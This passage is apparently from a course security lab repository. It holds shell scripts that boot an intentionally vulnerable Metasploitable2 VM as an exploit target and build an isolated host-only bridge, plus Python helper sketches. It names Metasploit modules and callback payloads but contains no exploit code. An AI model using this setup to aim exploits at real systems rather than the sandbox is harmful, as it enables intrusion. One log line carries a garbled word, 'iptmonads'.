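    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.connect(path)
        with sock.makefile("rb") as fp:
            yield from stamp_rows(fp)


if __name__ == "__main__":
    demo = [b'{"source": "guest_agent"}\n', b'{"trunc', b"\n"]
    for row in stamp_rows(demo):
        print(row["source"], row["t_host_mono_ns"] > 0)
```

Usage against a running VM would be along the lines of `for row in read_agent_socket("/tmp/cis490-vm-0/agent.sock"): ...`, with the path taken from the launcher's `RUN_DIR`.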
117
vm/launch_target.sh
Executable file
@ -0,0 +1,117 @@
#!/usr/bin/env bash
# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the
# exploit fires against). Companion to ``launch_demo.sh``, which boots
# the *idle* Alpine guest used in Tiers 1-2.
#
# Networking note: by default this launcher uses SLIRP usermode
# networking with ``restrict=on`` plus an explicit ``hostfwd`` for each
# vulnerable port. That gives us:
#   - the host can reach the guest's services (for msfrpcd + the
#     exploit module to drive ``RHOSTS=127.0.0.1``)
#   - the guest cannot reach the host or the internet (no NAT exit)
#
# The host-only ``br-malware`` bridge described in docs/architecture.md
# replaces SLIRP once the bridge-side pcap collector (source 4) lands —
# at which point payloads with ``reverse_tcp`` callbacks become viable
# too. Until then, we restrict module choices to ones that return a
# shell on the same socket they exploit (e.g. vsftpd_234_backdoor).
#
# Run-dir contract (read by run_tier3_demo.py):
#   $RUN_DIR/qemu.pid
#   $RUN_DIR/qmp.sock
#   $RUN_DIR/monitor.sock
#   $RUN_DIR/serial.sock

set -euo pipefail

REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
SLOT="${SLOT:-0}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
RAM_MIB="${RAM_MIB:-512}"
# When BRIDGE is set, attach a tap to the host-only bridge instead of
# using SLIRP. Pcap-feature episodes (source 4) require this.
BRIDGE="${BRIDGE:-}"
TAP="${TAP:-cis490target$SLOT}"
# Ports the host should forward to the guest. Comma-separated host:guest pairs.
# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
PORT_BASE="${PORT_BASE:-$((21 + SLOT * 100))}"
TARGET_PORTS="${TARGET_PORTS:-${PORT_BASE}:21}"
# KVM if the host can take it; otherwise fall back to TCG. Cross-arch
# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG.
ACCEL="${ACCEL:-}"

mkdir -p "$RUN_DIR"
QMP_SOCK="$RUN_DIR/qmp.sock"
MON_SOCK="$RUN_DIR/monitor.sock"
PID_FILE="$RUN_DIR/qemu.pid"
SERIAL_SOCK="$RUN_DIR/serial.sock"

if [[ ! -f "$IMAGE" ]]; then
    cat >&2 <<EOF
no target image at $IMAGE

Drop a vulnerable Linux qcow2 there. The canonical choice is
Metasploitable2 — see docs/sources.md for the download + sha256.

If the image is x86 and your host is not, set ACCEL=tcg explicitly.
EOF
    exit 1
fi

# Build the netdev string. With BRIDGE set we use a tap on the host-only
# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
# usermode + restrict=on for the no-egress smoke runs.
if [[ -n "$BRIDGE" ]]; then
    NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
else
    NETDEV="user,id=n0,restrict=on"
    IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
    for pair in "${_PAIRS[@]}"; do
        host_port="${pair%%:*}"
        guest_port="${pair##*:}"
        NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
    done
fi

# Pick acceleration: explicit override wins; otherwise use KVM if the
# device is present, else TCG.
if [[ -z "$ACCEL" ]]; then
    if [[ -e /dev/kvm && -r /dev/kvm && -w /dev/kvm ]]; then
        ACCEL="kvm"
    else
        ACCEL="tcg"
    fi
fi

CPU_FLAGS=()
if [[ "$ACCEL" == "kvm" ]]; then
    CPU_FLAGS=(-cpu host)
fi

AGENT_SOCK="$RUN_DIR/agent.sock"

# snapshot=on so the qcow2 is never mutated — every boot is identical.
# Second virtio-serial port carries the in-guest agent's telemetry to
# the host (see vm/guest-agent/). Targets without the agent installed
# (e.g. unmodified Metasploitable2) leave the device unused — the
# host-side collector simply gets no rows. Harmless.
#
# The ${CPU_FLAGS[@]+...} form keeps `set -u` from tripping on the empty
# array under bash older than 4.4 (the TCG path leaves it empty).
exec qemu-system-x86_64 \
    -name cis490-target \
    -machine q35,accel="$ACCEL" \
    ${CPU_FLAGS[@]+"${CPU_FLAGS[@]}"} \
    -smp 1,sockets=1,cores=1,threads=1 \
    -m "$RAM_MIB" \
    -drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
    -netdev "$NETDEV" \
    -device virtio-net-pci,netdev=n0 \
    -device virtio-serial-pci,id=cis490vs0 \
    -chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
    -device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
    -nographic \
    -serial unix:"$SERIAL_SOCK",server=on,wait=off \
    -monitor unix:"$MON_SOCK",server=on,wait=off \
    -qmp unix:"$QMP_SOCK",server=on,wait=off \
    -pidfile "$PID_FILE" \
    -display none
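
The launcher's netdev construction is easy to get subtly wrong when `TARGET_PORTS` holds several pairs, so it can help to mirror it in a test harness. The following is a sketch only: `default_target_ports` and `build_netdev` are hypothetical Python names that reproduce the string the shell code above assembles, with added validation that the script itself does not perform.

```python
def default_target_ports(slot: int = 0) -> str:
    """Mirror of the PORT_BASE default: host port 21 + slot * 100 → guest 21."""
    return f"{21 + slot * 100}:21"


def build_netdev(target_ports: str, bridge: str = "",
                 tap: str = "cis490target0") -> str:
    """Build the value passed to QEMU's -netdev option.

    With a bridge set, a pre-existing tap is used; otherwise SLIRP with
    restrict=on plus one hostfwd rule per host:guest pair.
    """
    if bridge:
        return f"tap,id=n0,ifname={tap},script=no,downscript=no"
    netdev = "user,id=n0,restrict=on"
    for pair in target_ports.split(","):
        host_port, sep, guest_port = pair.strip().partition(":")
        if not sep:
            raise ValueError(f"expected host:guest, got {pair!r}")
        # int() rejects non-numeric ports early instead of at QEMU start.
        netdev += f",hostfwd=tcp:127.0.0.1:{int(host_port)}-:{int(guest_port)}"
    return netdev


if __name__ == "__main__":
    print(build_netdev(default_target_ports(1)))
    print(build_netdev("2121:21,8080:80"))
```

On most Linux hosts, binding host ports below 1024 (including the default 21, 121, 221) needs elevated privileges, so an unprivileged run may want a `TARGET_PORTS` override such as `2121:21`.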
56
vm/setup_bridge.sh
Executable file
@ -0,0 +1,56 @@
#!/usr/bin/env bash
# Create the host-only ``br-malware`` bridge for Tier-3+ episodes.
#
# Properties (from docs/architecture.md):
#   - Bridge address 10.200.0.1/24 on the host side.
#   - NO NAT, NO route, NO DNS — guests cannot reach the host or the
#     internet. The bridge only carries traffic between the host and
#     the guests on it.
#   - Lab-host and target VMs both attach via tap devices. The
#     launchers pass script=no, so each tap must already exist and be
#     a member of the bridge (operator: ip tuntap).
#
# Run as root, ONCE per host. Idempotent — re-running is safe.

set -euo pipefail

BRIDGE="${BRIDGE:-br-malware}"
BRIDGE_IP="${BRIDGE_IP:-10.200.0.1/24}"

log() { printf '[setup_bridge] %s\n' "$*" >&2; }

[[ $EUID -eq 0 ]] || { log "must run as root"; exit 1; }

if ! command -v ip >/dev/null; then
    # Single quotes: backticks inside double quotes would try to run `ip`.
    log 'iproute2 (`ip`) is required'
    exit 1
fi

if ! ip link show "$BRIDGE" >/dev/null 2>&1; then
    log "creating bridge $BRIDGE"
    ip link add name "$BRIDGE" type bridge
    # Disable spanning-tree on the host-only bridge — it isn't needed
    # and adds startup delay.
    ip link set "$BRIDGE" type bridge stp_state 0
fi

ip link set "$BRIDGE" up

# Add the host-side address if not already there. Match the literal
# "inet <addr>/" so 10.200.0.1 does not also match 10.200.0.10.
if ! ip -4 addr show dev "$BRIDGE" | grep -qF "inet ${BRIDGE_IP%%/*}/"; then
    log "adding $BRIDGE_IP to $BRIDGE"
    ip addr add "$BRIDGE_IP" dev "$BRIDGE"
fi

# Warn if the kernel could forward between this bridge and any other
# interface. We don't want a misconfigured net.ipv4.ip_forward to leak
# the malware bridge to the LAN. This script only warns; the firewall
# has to do the actual blocking.
if [[ "$(cat /proc/sys/net/ipv4/ip_forward)" == "1" ]]; then
    log "WARNING: net.ipv4.ip_forward=1 — make sure iptmonads / nftables"
    log "blocks traffic from $BRIDGE to non-loopback devices."
fi

log "bridge ready: $(ip -4 -br addr show "$BRIDGE")"
log ""
log "Launchers can now opt into tap+bridge mode by setting:"
log "  BRIDGE=$BRIDGE   (tells the launchers to use a tap that is already a member of this bridge)"
log "Default launcher behaviour stays SLIRP usermode for simplicity."
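
The script's idempotency rests on detecting whether the bridge already carries the host-side address. A sketch of an exact-token check over `ip -4 addr show` output follows; `has_inet_address` is a hypothetical helper and the sample text is illustrative rather than captured from a lab host. It shows why comparing whole tokens avoids the prefix confusion a substring match is prone to.

```python
def has_inet_address(ip_addr_output: str, cidr: str) -> bool:
    """True if a line of `ip -4 addr show` output reads `inet <cidr> ...`."""
    for line in ip_addr_output.splitlines():
        tokens = line.split()
        if len(tokens) >= 2 and tokens[0] == "inet" and tokens[1] == cidr:
            return True
    return False


if __name__ == "__main__":
    # Illustrative sample in the usual `ip -4 addr show` layout.
    sample = (
        "4: br-malware: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500\n"
        "    inet 10.200.0.10/24 scope global br-malware\n"
        "       valid_lft forever preferred_lft forever\n"
    )
    print(has_inet_address(sample, "10.200.0.1/24"))   # substring would match
    print(has_inet_address(sample, "10.200.0.10/24"))
```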